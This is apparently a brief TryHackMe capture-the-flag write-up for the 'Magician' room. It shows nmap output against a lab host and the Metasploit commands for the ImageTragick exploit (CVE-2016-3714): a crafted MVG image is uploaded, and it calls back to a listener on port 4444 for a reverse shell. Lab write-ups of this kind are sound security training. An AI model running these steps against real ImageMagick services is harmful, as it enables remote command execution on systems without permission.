# CTF TryHackMe - Magician

## Nmap
```bash
nmap -sC -sV -oN nmap.log 10.10.205.121
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-30 06:54 CEST
Stats: 0:00:10 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 92.80% done; ETC: 06:54 (0:00:01 remaining)
Nmap scan report for magician (10.10.205.121)
Host is up (0.094s latency).
Not shown: 998 closed ports
PORT     STATE SERVICE VERSION
21/tcp   open  ftp     vsftpd 2.0.8 or later
8081/tcp open  http    nginx 1.14.0 (Ubuntu)
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: magician
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 38.60 seconds
```

## Connecting to the ftp as anonymous

We found a link to help us **https://imagetragick.com**

I have search on google for **CVE-2016-3714** exploit.
Lets follow this ImageTragick Exploitation

But, no one work with me...

## Used metasploit

```bash
msf6 > search imagemagick
3  exploit/unix/fileformat/imagemagick_delegate         2016-05-03       excellent  No     ImageMagick Delegate Arbitrary Command Execution

msf6 > use 3 

set LHOST tun0
set target MVG\ file

run
```

cp /home/grib/.msf4/local/msf.png .

start listener on port 4444

and upload image

